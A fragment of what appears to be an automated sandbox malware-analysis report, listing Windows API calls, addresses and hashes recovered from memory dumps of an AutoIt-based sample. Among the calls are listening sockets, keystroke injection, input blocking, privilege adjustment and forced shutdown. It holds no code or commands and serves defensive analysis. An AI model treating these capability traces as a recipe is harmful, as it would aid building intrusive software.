                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079BF0F
                                                                                                                                          • Part of subcall function 0079BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0079BF3C
                                                                                                                                          • Part of subcall function 0079BEC3: GetLastError.KERNEL32 ref: 0079BF49
                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 007A830C
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007B9235
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9244
                                                                                                                                        • bind.WS2_32(00000000,?,00000010), ref: 007B9260
                                                                                                                                        • listen.WS2_32(00000000,00000005), ref: 007B926F
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9289
                                                                                                                                        • closesocket.WS2_32(00000000), ref: 007B929D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                        • _memmove.LIBCMT ref: 007D3020
                                                                                                                                        • _memmove.LIBCMT ref: 007D3135
                                                                                                                                        • _memmove.LIBCMT ref: 007D31DC
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007BACD3: inet_addr.WS2_32(00000000), ref: 007BACF5
                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 007B973D
                                                                                                                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 007B9760
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007AF37A
                                                                                                                                        • _wcscmp.LIBCMT ref: 007AF3AA
                                                                                                                                        • _wcscmp.LIBCMT ref: 007AF3BF
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007AF3D0
                                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007AF3FE
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007A439C
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 007A43B8
                                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007A4425
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007A4483
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CEFE2
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007DF3C3,?,?,?,?,?), ref: 007CEFF7
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CF041
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,007DF3C3,?,?,?), ref: 007CF077
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1423138444-0
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007A221E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: ($|
                                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0077AE5E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        APIs
                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007B4A1E,00000000), ref: 007B55FD
                                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007B5629
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 599397726-0
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AEA95
                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007AEAEF
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007AEB3C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1682464887-0
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A704C
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007A708D
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A7098
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 33631002-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • GetParent.USER32(?), ref: 007DF4B5
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0077ADDD,?,?,?,00000006,?), ref: 007DF52F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007AFD71
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007AFDA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,007DF352,?,?,?), ref: 007CF115
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007CF0FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                        APIs
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CF47D
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,007DF42E,?,?,?,?,?), ref: 007CF4A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007BC2E2,?,?,00000000,?), ref: 007AD73F
                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007BC2E2,?,?,00000000,?), ref: 007AD751
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                        APIs
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007A4B89
                                                                                                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 007A4B9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                        APIs
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0079B8C5
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079B8D7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 007CF59C
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,007DF3AD,?,?,?,?), ref: 007CF5C6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0076125D,00787A43,00760F35,?,?,00000001), ref: 00788E41
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00788E4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 007D0352
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 007CE7AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CallLongProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4084987330-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B736: GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                          • Part of subcall function 0077B736: ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,007DF417,?,?,?,?,?,00000001,?), ref: 007CEA9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2356834413-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0077AF40,?,?,?,?,?), ref: 0077B83B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        APIs
                                                                                                                                        • BlockInput.USER32(00000001), ref: 007B7057
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BlockInput
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007CF41A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0077ACC7
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,007DF3D4,?,?,?,?,?,?), ref: 007CF450
                                                                                                                                          • Part of subcall function 007CE13E: _memset.LIBCMT ref: 007CE14D
                                                                                                                                          • Part of subcall function 007CE13E: _memset.LIBCMT ref: 007CE15C
                                                                                                                                          • Part of subcall function 007CE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00823EE0,00823F24), ref: 007CE18B
                                                                                                                                          • Part of subcall function 007CE13E: CloseHandle.KERNEL32 ref: 007CE19D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2364484715-0
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 007CF3A1
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 007CF3D0
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                        • Opcode ID: 68c9541a09d038cc0b327ea15c8106163e5c3156b1230c6cb090d97bedd41f9f
                                                                                                                                        • Instruction ID: 892ffc0a6cbb9e87ddabb0839d91ab90f935472d51149e6493763c28e7aac9ae
                                                                                                                                        • Opcode Fuzzy Hash: 68c9541a09d038cc0b327ea15c8106163e5c3156b1230c6cb090d97bedd41f9f
                                                                                                                                        • Instruction Fuzzy Hash: D5E0173820024CEFCB01DF88D888E863BA5FB1A350F004054FD048B362C772A831EBA1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0077B85B), ref: 0077B926
                                                                                                                                          • Part of subcall function 0077B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0077B85B,00000000,?,?,0077AF1E,?,?), ref: 0077B9BD
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0077AF1E,?,?), ref: 0077B864
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00788E1F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00786AE9,008167D8,00000014), ref: 0078A937
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007BA7A5
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007BA7B7
                                                                                                                                        • DestroyWindow.USER32 ref: 007BA7C5
                                                                                                                                        • GetDesktopWindow.USER32 ref: 007BA7DF
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 007BA7E6
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007BA927
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007BA937
                                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA97F
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 007BA98B
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007BA9C5
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA9E7
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA9FA
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAA05
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007BAA0E
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAA1D
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007BAA26
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAA2D
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007BAA38
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 007BAA4A
                                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007ED9BC,00000000), ref: 007BAA60
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007BAA70
                                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007BAA96
                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007BAAB5
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAAD7
                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BACC4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                        APIs
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 007CD0EB
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 007CD11C
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 007CD128
                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 007CD142
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 007CD151
                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 007CD17C
                                                                                                                                        • GetSysColor.USER32(00000010), ref: 007CD184
                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 007CD18B
                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 007CD19A
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007CD1A1
                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 007CD1EC
                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 007CD21E
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CD249
                                                                                                                                          • Part of subcall function 007CD385: GetSysColor.USER32(00000012), ref: 007CD3BE
                                                                                                                                          • Part of subcall function 007CD385: SetTextColor.GDI32(?,?), ref: 007CD3C2
                                                                                                                                          • Part of subcall function 007CD385: GetSysColorBrush.USER32(0000000F), ref: 007CD3D8
                                                                                                                                          • Part of subcall function 007CD385: GetSysColor.USER32(0000000F), ref: 007CD3E3
                                                                                                                                          • Part of subcall function 007CD385: GetSysColor.USER32(00000011), ref: 007CD400
                                                                                                                                          • Part of subcall function 007CD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CD40E
                                                                                                                                          • Part of subcall function 007CD385: SelectObject.GDI32(?,00000000), ref: 007CD41F
                                                                                                                                          • Part of subcall function 007CD385: SetBkColor.GDI32(?,00000000), ref: 007CD428
                                                                                                                                          • Part of subcall function 007CD385: SelectObject.GDI32(?,?), ref: 007CD435
                                                                                                                                          • Part of subcall function 007CD385: InflateRect.USER32(?,000000FF,000000FF), ref: 007CD454
                                                                                                                                          • Part of subcall function 007CD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CD46B
                                                                                                                                          • Part of subcall function 007CD385: GetWindowLongW.USER32(00000000,000000F0), ref: 007CD480
                                                                                                                                          • Part of subcall function 007CD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CD4A8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
